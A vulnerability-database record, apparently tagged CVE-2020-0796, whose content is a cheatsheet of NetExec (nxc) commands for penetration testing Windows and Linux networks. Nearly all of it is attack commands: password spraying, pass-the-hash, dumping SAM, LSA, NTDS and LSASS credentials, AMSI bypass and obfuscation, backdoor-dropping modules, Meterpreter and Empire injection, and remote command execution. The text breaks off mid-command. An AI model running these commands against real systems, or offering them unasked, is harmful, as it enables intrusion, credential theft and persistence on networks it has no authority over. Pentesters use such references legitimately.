{"uuid": "9a2eaadd-b6c8-44b3-867b-c27ce5ebdf1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://gist.github.com/Porkballs/df8b4b4e30522a04debf3644594d1535", "content": "# NXC (NetExec) Cheatsheet\n\nComplete reference for NetExec (NXC) - the network execution tool for pentesting\n\n> **Version Note**: This cheatsheet is based on the latest NetExec version. Always check `nxc  --help` and `nxc  -L` for your specific version.\n\n## Installation\n```bash\npipx install netexec\n# or\napt install netexec\n```\n\n## Basic Syntax\n\n`nxc   -u  -p  / -H  [flags] -M  -o `\n\n---\n\n## Protocols Overview\n\n- `smb` - SMB/CIFS (Port 445)\n- `ldap` - LDAP (Port 389/636)\n- `winrm` - WinRM (Port 5985/5986)\n- `ssh` - SSH (Port 22)\n- `rdp` - RDP (Port 3389)\n- `mssql` - Microsoft SQL Server (Port 1433)\n- `ftp` - FTP (Port 21)\n- `wmi` - WMI (Port 135)\n- `vnc` - VNC (Port 5900)\n- `nfs` - NFS (Port 111)\n\n---\n\n## Target Specification\n```bash\nnxc smb 192.168.1.10                    # Single host\nnxc smb 192.168.1.0/24                  # CIDR range\nnxc smb 192.168.1.1-100                 # Range\nnxc smb targets.txt                     # File with targets (one per line)\n```\n\n---\n\n## Password Spraying\n\n### Pattern: protocol targets.txt users.txt passwords.txt\n\n```bash\n# Domain authentication (default)\nnxc smb targets.txt -u users.txt -p passwords.txt -d DOMAIN\n\n# Local authentication\nnxc smb targets.txt -u users.txt -p passwords.txt --local-auth\n\n# Continue on success (don't stop after first valid)\nnxc smb targets.txt -u users.txt -p passwords.txt --continue-on-success\n\n# Stop on first success per target\nnxc smb targets.txt -u users.txt -p passwords.txt --no-bruteforce\n\n# Single password spray (safer for avoiding lockouts)\nnxc smb targets.txt -u users.txt -p 'Password123!' 
-d DOMAIN --continue-on-success\n\n# With jitter to avoid detection\nnxc smb targets.txt -u users.txt -p passwords.txt --jitter 5\n\n# Fail limit options\nnxc smb targets.txt -u users.txt -p passwords.txt --gfail-limit 10     # Global fail limit\nnxc smb targets.txt -u users.txt -p passwords.txt --ufail-limit 3      # Per-user fail limit\nnxc smb targets.txt -u users.txt -p passwords.txt --fail-limit 5       # Per-host fail limit\n```\n\n---\n\n## No Authentication\n\n```bash\n# Null session (empty username)\nnxc smb 192.168.1.10 -u '' -p ''\n\n# Guest account\nnxc smb 192.168.1.10 -u 'guest' -p ''\n\n# Anonymous LDAP bind\nnxc ldap 192.168.1.10 -u '' -p ''\n\n# Enumerate without credentials\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt    # SMB signing check\n```\n\n---\n\n## Authentication Methods\n\n### Username and Password\n```bash\nnxc smb 192.168.1.10 -u admin -p 'password'\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN\nnxc smb 192.168.1.10 -u admin -p 'password' --local-auth\n```\n\n### Pass-the-Hash\n```bash\nnxc smb 192.168.1.10 -u admin -H \nnxc smb 192.168.1.10 -u admin -H \nnxc smb 192.168.1.10 -u admin -H  -d DOMAIN\n```\n\n### Kerberos Authentication\n```bash\n# With password\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN -k\n\n# Using cached ticket (ccache)\nnxc smb 192.168.1.10 -u admin --use-kcache -k\n\n# With AES key\nnxc smb 192.168.1.10 -u admin --aesKey  -k\n\n# Specify KDC\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN -k --kdcHost dc01.domain.local\n```\n\n### Certificate Authentication\n```bash\n# PFX certificate\nnxc smb 192.168.1.10 --pfx-cert cert.pfx --pfx-pass password\n\n# PEM certificate\nnxc smb 192.168.1.10 --pem-cert cert.pem --pem-key key.pem\n```\n\n---\n\n## SMB Protocol (Port 445)\n\n### Basic Enumeration (No Auth)\n```bash\nnxc smb 192.168.1.0/24                              # Check SMB version, signing\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt  # Find relay targets\n```\n\n### 
Enumeration (With Auth)\n```bash\nnxc smb 192.168.1.10 -u user -p pass --shares              # List shares\nnxc smb 192.168.1.10 -u user -p pass --shares --filter-shares read,write  # Filter by access\nnxc smb 192.168.1.10 -u user -p pass --dir \"C$\"            # List directory contents\nnxc smb 192.168.1.10 -u user -p pass --users               # Enumerate users\nnxc smb 192.168.1.10 -u user -p pass --users --enabled     # Only enabled users\nnxc smb 192.168.1.10 -u user -p pass --users-export out.txt  # Export users to file\nnxc smb 192.168.1.10 -u user -p pass --groups              # Enumerate groups\nnxc smb 192.168.1.10 -u user -p pass --computers           # Enumerate computers\nnxc smb 192.168.1.10 -u user -p pass --local-groups        # Local groups\nnxc smb 192.168.1.10 -u user -p pass --pass-pol            # Password policy\nnxc smb 192.168.1.10 -u user -p pass --smb-sessions        # Active SMB sessions\nnxc smb 192.168.1.10 -u user -p pass --disks               # Enumerate disks\nnxc smb 192.168.1.10 -u user -p pass --interfaces          # Network interfaces\nnxc smb 192.168.1.10 -u user -p pass --loggedon-users      # Logged on users\nnxc smb 192.168.1.10 -u user -p pass --rid-brute           # RID cycling\nnxc smb 192.168.1.10 -u user -p pass --qwinsta             # RDP connections\nnxc smb 192.168.1.10 -u user -p pass --tasklist            # Running processes\n```\n\n### WMI Queries\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Process\"\nnxc smb 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Service\" --wmi-namespace \"root\\cimv2\"\n```\n\n### Spidering Shares\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --spider C$\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --spider-folder Users\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --pattern password\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --regex \".*\\.txt$\"\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --content       # Search 
file content\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --depth 3       # Max recursion depth\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --only-files    # Files only\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --exclude-dirs Windows,System32\n```\n\n### Command Execution\n```bash\nnxc smb 192.168.1.10 -u admin -p pass -x \"whoami\"                    # CMD\nnxc smb 192.168.1.10 -u admin -p pass -X '$PSVersionTable'           # PowerShell\nnxc smb 192.168.1.10 -u admin -p pass --exec-method smbexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method atexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method wmiexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method mmcexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --no-output -x \"command\"       # Don't retrieve output\n```\n\n### PowerShell Options\n```bash\nnxc smb 192.168.1.10 -u admin -p pass -X '$PSVersionTable' --obfs          # Obfuscate\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --amsi-bypass bypass.ps1\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --force-ps32            # Force 32-bit\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --no-encode             # Don't encode\nnxc smb 192.168.1.10 -u admin -p pass --clear-obfscripts                   # Clear cache\n```\n\n### File Operations\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --get-file \"\\\\Windows\\\\Temp\\\\file.txt\" ./local.txt\nnxc smb 192.168.1.10 -u admin -p pass --put-file ./payload.exe \"\\\\Windows\\\\Temp\\\\payload.exe\"\nnxc smb 192.168.1.10 -u admin -p pass --get-file \"\\\\file.txt\" ./out.txt --append-host\n```\n\n### Credential Dumping\n```bash\n# SAM Database\nnxc smb 192.168.1.10 -u admin -p pass --sam                        # Default method\nnxc smb 192.168.1.10 -u admin -p pass --sam secdump                # Using secdump\nnxc smb 192.168.1.10 -u admin -p pass --sam regdump                # Using regdump\n\n# LSA Secrets\nnxc 
smb 192.168.1.10 -u admin -p pass --lsa                        # Default method\nnxc smb 192.168.1.10 -u admin -p pass --lsa secdump                # Using secdump\nnxc smb 192.168.1.10 -u admin -p pass --lsa regdump                # Using regdump\n\n# NTDS (Domain Controller)\nnxc smb dc01.domain.local -u admin -p pass --ntds                  # Default (drsuapi)\nnxc smb dc01.domain.local -u admin -p pass --ntds vss              # Using VSS\nnxc smb dc01.domain.local -u admin -p pass --ntds drsuapi          # Using drsuapi\nnxc smb dc01.domain.local -u admin -p pass --ntds --user admin     # Specific user\nnxc smb dc01.domain.local -u admin -p pass --ntds --enabled        # Enabled accounts only\n\n# DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi                      # Dump DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi cookies              # Include cookies\nnxc smb 192.168.1.10 -u admin -p pass --dpapi nosystem             # Exclude SYSTEM\nnxc smb 192.168.1.10 -u admin -p pass --dpapi --mkfile masterkeys.txt\nnxc smb 192.168.1.10 -u admin -p pass --dpapi --pvk backupkey.pvk\n\n# SCCM\nnxc smb 192.168.1.10 -u admin -p pass --sccm                       # Default (wmi)\nnxc smb 192.168.1.10 -u admin -p pass --sccm wmi                   # Using WMI\nnxc smb 192.168.1.10 -u admin -p pass --sccm disk                  # Using disk\n```\n\n### SMB Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\n# Vulnerability Checks\nnxc smb 192.168.1.10 -u user -p pass -M ms17-010                   # EternalBlue\nnxc smb 192.168.1.10 -u user -p pass -M zerologon                  # CVE-2020-1472\nnxc smb 192.168.1.10 -u user -p pass -M nopac                      # CVE-2021-42278/42287\nnxc smb 192.168.1.10 -u user -p pass -M printnightmare             # PrintNightmare\nnxc smb 192.168.1.10 -u user -p pass -M remove-mic                 # CVE-2019-1040\nnxc smb 192.168.1.10 -u user -p pass -M smbghost                   # CVE-2020-0796\nnxc smb 192.168.1.10 -u user -p pass -M 
coerce_plus                # Coercion vulns\nnxc smb 192.168.1.10 -u user -p pass -M timeroast                  # Timeroasting\n\n# Enumeration\nnxc smb 192.168.1.10 -u user -p pass -M enum_av                    # AV products\nnxc smb 192.168.1.10 -u user -p pass -M enum_ca                    # ADCS CAs\nnxc smb 192.168.1.10 -u user -p pass -M ioxidresolver              # Additional interfaces\nnxc smb 192.168.1.10 -u user -p pass -M spooler                    # Print spooler\nnxc smb 192.168.1.10 -u user -p pass -M webdav                     # WebClient service\nnxc smb 192.168.1.10 -u user -p pass -M spider_plus                # Spider shares\nnxc smb 192.168.1.10 -u user -p pass -M spider_plus -o READ_ONLY=false\n\n# Password Hunting\nnxc smb 192.168.1.10 -u user -p pass -M gpp_password               # GPP passwords\nnxc smb 192.168.1.10 -u user -p pass -M gpp_autologin              # GPP autologin\n\n# Backdoors\nnxc smb 192.168.1.10 -u user -p pass -M drop-sc                    # Drop searchConnector\nnxc smb 192.168.1.10 -u user -p pass -M scuffy                     # Drop .scf files\nnxc smb 192.168.1.10 -u user -p pass -M slinky                     # Create LNK backdoors\n\n# Computer Management\nnxc smb 192.168.1.10 -u user -p pass -M add-computer               # Add/delete computer\nnxc smb 192.168.1.10 -u user -p pass -M backup_operator            # Backup operator exploit\n```\n\n#### HIGH PRIVILEGE MODULES (requires admin)\n```bash\n# Credential Dumping\nnxc smb 192.168.1.10 -u admin -p pass -M lsassy                    # LSASS dump\nnxc smb 192.168.1.10 -u admin -p pass -M nanodump                  # Alternative LSASS\nnxc smb 192.168.1.10 -u admin -p pass -M procdump                  # Process dump\nnxc smb 192.168.1.10 -u admin -p pass -M handlekatz                # Handle dump\nnxc smb 192.168.1.10 -u admin -p pass -M dpapi_hash                # DPAPI masterkeys\nnxc smb 192.168.1.10 -u admin -p pass -M hash_spider               # Recursive 
LSASS\nnxc smb 192.168.1.10 -u admin -p pass -M ntdsutil                  # NTDS with ntdsutil\n\n# Application Credentials\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_discover          # Find KeePass\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_trigger           # KeePass trigger\nnxc smb 192.168.1.10 -u admin -p pass -M mobaxterm                 # MobaXterm creds\nnxc smb 192.168.1.10 -u admin -p pass -M mremoteng                 # mRemoteNG creds\nnxc smb 192.168.1.10 -u admin -p pass -M putty                     # PuTTY keys\nnxc smb 192.168.1.10 -u admin -p pass -M rdcman                    # RDCMan creds\nnxc smb 192.168.1.10 -u admin -p pass -M winscp                    # WinSCP creds\nnxc smb 192.168.1.10 -u admin -p pass -M vnc                       # VNC passwords\nnxc smb 192.168.1.10 -u admin -p pass -M wifi                      # WiFi passwords\nnxc smb 192.168.1.10 -u admin -p pass -M veeam                     # Veeam DB creds\nnxc smb 192.168.1.10 -u admin -p pass -M msol                      # Azure AD Connect\nnxc smb 192.168.1.10 -u admin -p pass -M teams_localdb             # Teams SSO cookie\nnxc smb 192.168.1.10 -u admin -p pass -M wam                       # Token Broker Cache\n\n# Enumeration\nnxc smb 192.168.1.10 -u admin -p pass -M enum_dns                  # DNS records (WMI)\nnxc smb 192.168.1.10 -u admin -p pass -M get_netconnections        # Network connections\nnxc smb 192.168.1.10 -u admin -p pass -M bitlocker                 # BitLocker status\nnxc smb 192.168.1.10 -u admin -p pass -M hyperv-host               # HyperV host\nnxc smb 192.168.1.10 -u admin -p pass -M iis                       # IIS app pool creds\nnxc smb 192.168.1.10 -u admin -p pass -M install_elevated          # AlwaysInstallElevated\nnxc smb 192.168.1.10 -u admin -p pass -M ntlmv1                    # NTLMv1 enabled\nnxc smb 192.168.1.10 -u admin -p pass -M runasppl                  # RunAsPPL status\nnxc smb 192.168.1.10 -u admin -p pass -M uac          
             # UAC status\nnxc smb 192.168.1.10 -u admin -p pass -M wcc                       # Security config\nnxc smb 192.168.1.10 -u admin -p pass -M security-questions        # Security Q&A\n\n# File Operations\nnxc smb 192.168.1.10 -u admin -p pass -M notepad++                 # Unsaved files\nnxc smb 192.168.1.10 -u admin -p pass -M powershell_history        # PS history\nnxc smb 192.168.1.10 -u admin -p pass -M recent_files              # Recent files\nnxc smb 192.168.1.10 -u admin -p pass -M snipped                   # Snipping Tool\n\n# Persistence & Execution\nnxc smb 192.168.1.10 -u admin -p pass -M empire_exec               # Empire agent\nnxc smb 192.168.1.10 -u admin -p pass -M met_inject                # Meterpreter\nnxc smb 192.168.1.10 -u admin -p pass -M web_delivery              # Web delivery\nnxc smb 192.168.1.10 -u admin -p pass -M impersonate               # Token impersonation\nnxc smb 192.168.1.10 -u admin -p pass -M pi                        # Process injection\nnxc smb 192.168.1.10 -u admin -p pass -M schtask_as                # Scheduled task\n\n# Configuration Changes\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable      # Enable RDP\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=disable     # Disable RDP\nnxc smb 192.168.1.10 -u admin -p pass -M shadowrdp                 # Shadow RDP\nnxc smb 192.168.1.10 -u admin -p pass -M wdigest -o ACTION=enable  # Enable WDigest\nnxc smb 192.168.1.10 -u admin -p pass -M remote-uac                # Remote UAC\n\n# Registry Operations\nnxc smb 192.168.1.10 -u admin -p pass -M reg-query                 # Registry query\nnxc smb 192.168.1.10 -u admin -p pass -M reg-winlogon              # Winlogon creds\n\n# Utility\nnxc smb 192.168.1.10 -u admin -p pass -M test_connection           # Test connectivity\n```\n\n---\n\n## LDAP Protocol (Port 389/636)\n\n### Basic Enumeration\n```bash\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN\nnxc ldap 192.168.1.10 -u user -p pass 
-d DOMAIN --users           # Enumerate all users\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users user123   # Specific user\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users-export out.txt\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --groups          # Enumerate all groups\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --groups \"Domain Admins\"\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --computers       # Enumerate computers\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --dc-list         # List DCs\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --get-sid         # Get domain SID\n```\n\n### Advanced Queries\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --admin-count               # adminCount=1 users\nnxc ldap 192.168.1.10 -u user -p pass --trusted-for-delegation    # Trusted delegation\nnxc ldap 192.168.1.10 -u user -p pass --password-not-required     # Empty passwords allowed\nnxc ldap 192.168.1.10 -u user -p pass --active-users              # Active accounts only\nnxc ldap 192.168.1.10 -u user -p pass --find-delegation           # Delegation relationships\n\n# GMSA\nnxc ldap 192.168.1.10 -u user -p pass --gmsa                       # Enumerate GMSA\nnxc ldap 192.168.1.10 -u user -p pass --gmsa-convert-id gmsa_name\nnxc ldap 192.168.1.10 -u user -p pass --gmsa-decrypt-lsa lsa_data\n\n# Custom LDAP Query\nnxc ldap 192.168.1.10 -u user -p pass --query \"(objectClass=user)\" \"cn,sAMAccountName\"\nnxc ldap 192.168.1.10 -u user -p pass --base-dn \"OU=Users,DC=domain,DC=local\"\n```\n\n### Kerberoasting & ASREPRoasting\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --kerberoasting output.txt\nnxc ldap 192.168.1.10 -u user -p pass --asreproast output.txt\n```\n\n### Bloodhound Collection\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c All\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Default\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c 
DCOnly\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Session,LoggedOn\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Group,LocalAdmin,ACL\n```\n\n### LDAP Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc ldap 192.168.1.10 -u user -p pass -M adcs                      # Find ADCS/PKI\nnxc ldap 192.168.1.10 -u user -p pass -M daclread                  # Read DACLs\nnxc ldap 192.168.1.10 -u user -p pass -M enum_trusts               # Trust relationships\nnxc ldap 192.168.1.10 -u user -p pass -M find-computer             # Find computers\nnxc ldap 192.168.1.10 -u user -p pass -M get-desc-users            # User descriptions\nnxc ldap 192.168.1.10 -u user -p pass -M get-network               # DNS records/IPs\nnxc ldap 192.168.1.10 -u user -p pass -M get-unixUserPassword      # Unix passwords\nnxc ldap 192.168.1.10 -u user -p pass -M get-userPassword          # User passwords\nnxc ldap 192.168.1.10 -u user -p pass -M groupmembership           # User group membership\nnxc ldap 192.168.1.10 -u user -p pass -M laps                      # LAPS passwords\nnxc ldap 192.168.1.10 -u user -p pass -M ldap-checker              # LDAP signing/binding\nnxc ldap 192.168.1.10 -u user -p pass -M maq                       # MachineAccountQuota\nnxc ldap 192.168.1.10 -u user -p pass -M obsolete                  # Obsolete OS\nnxc ldap 192.168.1.10 -u user -p pass -M pre2k                     # Pre-created accounts\nnxc ldap 192.168.1.10 -u user -p pass -M pso                       # Password policies\nnxc ldap 192.168.1.10 -u user -p pass -M sccm                      # SCCM infrastructure\nnxc ldap 192.168.1.10 -u user -p pass -M subnets                   # Sites and subnets\nnxc ldap 192.168.1.10 -u user -p pass -M user-desc                 # User descriptions\nnxc ldap 192.168.1.10 -u user -p pass -M whoami                    # Current user details\n```\n\n---\n\n## WinRM Protocol (Port 5985/5986)\n\n### Basic Usage\n```bash\nnxc winrm 192.168.1.10 -u admin -p 
pass\nnxc winrm 192.168.1.10 -u admin -H \nnxc winrm 192.168.1.10 -u admin -p pass -d DOMAIN\nnxc winrm 192.168.1.10 -u admin -p pass --local-auth\nnxc winrm 192.168.1.10 -u admin -p pass --laps                     # LAPS auth\n```\n\n### Port Configuration\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass --port 5985                # HTTP only\nnxc winrm 192.168.1.10 -u admin -p pass --port 5986                # HTTPS only\nnxc winrm 192.168.1.10 -u admin -p pass --port 5985 5986           # Both ports\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto http         # HTTP only\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto https        # HTTPS only\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto http https   # Both protocols\nnxc winrm 192.168.1.10 -u admin -p pass --http-timeout 15          # Timeout\n```\n\n### Command Execution\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass -x \"whoami\"\nnxc winrm 192.168.1.10 -u admin -p pass -X '$PSVersionTable'\nnxc winrm 192.168.1.10 -u admin -p pass -x \"ipconfig /all\"\nnxc winrm 192.168.1.10 -u admin -p pass --no-output -x \"command\"\n```\n\n### Credential Dumping\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass --sam                      # Dump SAM\nnxc winrm 192.168.1.10 -u admin -p pass --lsa                      # Dump LSA\nnxc winrm 192.168.1.10 -u admin -p pass --dump-method cmd          # Using cmd\nnxc winrm 192.168.1.10 -u admin -p pass --dump-method powershell   # Using PowerShell\n```\n\n### WinRM Modules\n```bash\n# No modules available for WinRM protocol in current version\n```\n\n---\n\n## SSH Protocol (Port 22)\n\n### Authentication\n```bash\nnxc ssh 192.168.1.10 -u root -p password\nnxc ssh 192.168.1.10 -u root -p passwords.txt\nnxc ssh 192.168.1.10 -u root --key-file id_rsa\nnxc ssh 192.168.1.10 -u root --key-file id_rsa -p passphrase\nnxc ssh 192.168.1.10 -u users.txt -p passwords.txt\nnxc ssh 192.168.1.10 -u root -p pass --port 2222\nnxc ssh 192.168.1.10 -u root -p pass 
--ssh-timeout 20\n```\n\n### Command Execution\n```bash\nnxc ssh 192.168.1.10 -u root -p pass -x \"cat /etc/passwd\"\nnxc ssh 192.168.1.10 -u root -p pass -x \"uname -a\"\nnxc ssh 192.168.1.10 -u root -p pass -x \"id\"\nnxc ssh 192.168.1.10 -u root -p pass --no-output -x \"command\"\n```\n\n### Sudo Operations\n```bash\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check                  # Check sudo privs\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check-method sudo-stdin\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check-method mkfifo\nnxc ssh 192.168.1.10 -u user -p pass --get-output-tries 10\n```\n\n### File Operations\n```bash\nnxc ssh 192.168.1.10 -u root -p pass --put-file local.txt /tmp/remote.txt\nnxc ssh 192.168.1.10 -u root -p pass --get-file /etc/passwd ./passwd.txt\n```\n\n### SSH Modules\n```bash\n# No modules available for SSH protocol in current version\n```\n\n---\n\n## RDP Protocol (Port 3389)\n\n### Check Access\n```bash\nnxc rdp 192.168.1.10 -u admin -p password\nnxc rdp 192.168.1.10 -u admin -H \nnxc rdp 192.168.1.10 -u users.txt -p passwords.txt -d DOMAIN\nnxc rdp 192.168.1.10 -u admin -p pass --local-auth\nnxc rdp 192.168.1.10 -u admin -p pass --port 3390\nnxc rdp 192.168.1.10 -u admin -p pass --rdp-timeout 10\n```\n\n### Screenshots\n```bash\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot --screentime 10\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot --res 1920x1080\nnxc rdp 192.168.1.10 -u admin -p pass --nla-screenshot             # If NLA disabled\n```\n\n### RDP Modules\n```bash\n# No modules available for RDP protocol in current version\n```\n\n---\n\n## MSSQL Protocol (Port 1433)\n\n### Authentication\n```bash\nnxc mssql 192.168.1.10 -u sa -p password\nnxc mssql 192.168.1.10 -u sa -p password --local-auth\nnxc mssql 192.168.1.10 -u user -p pass -d DOMAIN\nnxc mssql 192.168.1.10 -u user -p pass -d DOMAIN -k              # Kerberos\nnxc mssql 192.168.1.10 -u sa -H \nnxc mssql 
192.168.1.10 -u sa -p pass --port 1434\nnxc mssql 192.168.1.10 -u sa -p pass --mssql-timeout 10\n```\n\n### Queries\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT @@version\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT name FROM sys.databases\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT name FROM sys.server_principals\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"EXEC sp_helprotect\"\n```\n\n### Command Execution\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -x \"whoami\"                 # via xp_cmdshell\nnxc mssql 192.168.1.10 -u sa -p pass -X 'Get-Host'               # PowerShell\nnxc mssql 192.168.1.10 -u sa -p pass --no-output -x \"command\"\n```\n\n### PowerShell Options\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --force-ps32\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --obfs\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --amsi-bypass bypass.ps1\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --no-encode\nnxc mssql 192.168.1.10 -u sa -p pass --clear-obfscripts\n```\n\n### File Operations\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass --put-file local.txt C:\\\\Temp\\\\remote.txt\nnxc mssql 192.168.1.10 -u sa -p pass --get-file C:\\\\Temp\\\\file.txt ./local.txt\n```\n\n### Enumeration\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass --rid-brute                  # RID bruteforce\nnxc mssql 192.168.1.10 -u sa -p pass --rid-brute 5000\n```\n\n### MSSQL Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc mssql 192.168.1.10 -u user -p pass -M enum_impersonate        # Impersonation privs\nnxc mssql 192.168.1.10 -u user -p pass -M enum_logins             # SQL logins\nnxc mssql 192.168.1.10 -u user -p pass -M exec_on_link            # Execute on linked server\nnxc mssql 192.168.1.10 -u user -p pass -M link_enable_xp          # Enable xp_cmdshell on link\nnxc mssql 192.168.1.10 -u user -p pass -M link_xpcmd              # Run xp_cmdshell on link\nnxc mssql 192.168.1.10 -u user -p pass -M mssql_coerce            
# Execute arbitrary SQL\nnxc mssql 192.168.1.10 -u user -p pass -M mssql_priv              # Enumerate/exploit privs\n```\n\n#### HIGH PRIVILEGE MODULES\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -M empire_exec               # Empire agent\nnxc mssql 192.168.1.10 -u sa -p pass -M enum_links                # Enumerate linked servers\nnxc mssql 192.168.1.10 -u sa -p pass -M met_inject                # Meterpreter injection\nnxc mssql 192.168.1.10 -u sa -p pass -M nanodump                  # LSASS dump\nnxc mssql 192.168.1.10 -u sa -p pass -M test_connection           # Test connectivity\nnxc mssql 192.168.1.10 -u sa -p pass -M web_delivery              # Web delivery\n```\n\n---\n\n## FTP Protocol (Port 21)\n\n### Authentication\n```bash\nnxc ftp 192.168.1.10 -u admin -p password\nnxc ftp 192.168.1.10 -u anonymous -p ''\nnxc ftp 192.168.1.10 -u users.txt -p passwords.txt\nnxc ftp 192.168.1.10 -u admin -p pass --port 2121\n```\n\n### File Operations\n```bash\nnxc ftp 192.168.1.10 -u admin -p pass --ls                        # List root\nnxc ftp 192.168.1.10 -u admin -p pass --ls /var/www\nnxc ftp 192.168.1.10 -u admin -p pass --get file.txt\nnxc ftp 192.168.1.10 -u admin -p pass --put local.txt remote.txt\n```\n\n### FTP Modules\n```bash\n# No modules available for FTP protocol in current version\n```\n\n---\n\n## VNC Protocol (Port 5900)\n\n### Authentication\n```bash\nnxc vnc 192.168.1.10 -u admin -p password\nnxc vnc 192.168.1.10 -u admin -p passwords.txt\nnxc vnc 192.168.1.10 -u admin -p pass --port 5901\nnxc vnc 192.168.1.10 -u admin -p pass --vnc-sleep 5               # Rate limiting\n```\n\n### Screenshot\n```bash\nnxc vnc 192.168.1.10 -u admin -p pass --screenshot\nnxc vnc 192.168.1.10 -u admin -p pass --screenshot --screentime 5\n```\n\n### VNC Modules\n```bash\n# No modules available for VNC protocol in current version\n```\n\n---\n\n## NFS Protocol (Port 111)\n\n### Enumeration\n```bash\nnxc nfs 192.168.1.10                                               
# Basic enumeration\nnxc nfs 192.168.1.10 --shares                                      # List shares\nnxc nfs 192.168.1.10 --enum-shares                                 # Enumerate shares (depth 3)\nnxc nfs 192.168.1.10 --enum-shares 5                               # Custom depth\nnxc nfs 192.168.1.10 --port 2049\nnxc nfs 192.168.1.10 --nfs-timeout 10\n```\n\n### Share Operations\n```bash\nnxc nfs 192.168.1.10 --share /export --ls                          # List share root\nnxc nfs 192.168.1.10 --share /export --ls /path/to/dir\nnxc nfs 192.168.1.10 --share /export --get-file remote.txt local.txt\nnxc nfs 192.168.1.10 --share /export --put-file local.txt remote.txt\n```\n\n### NFS Modules\n```bash\n# No modules available for NFS protocol in current version\n```\n\n---\n\n## WMI Protocol (Port 135)\n\n### Basic Usage\n```bash\nnxc wmi 192.168.1.10 -u admin -p password\nnxc wmi 192.168.1.10 -u admin -H \nnxc wmi 192.168.1.10 -u admin -p pass -d DOMAIN\nnxc wmi 192.168.1.10 -u admin -p pass --local-auth\nnxc wmi 192.168.1.10 -u admin -p pass --rpc-timeout 5\n```\n\n### WMI Queries\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Process\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Service\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_ComputerSystem\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi-namespace \"root\\cimv2\"\n```\n\n### Command Execution\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-method wmiexec -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-method wmiexec-event -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-timeout 10\nnxc wmi 192.168.1.10 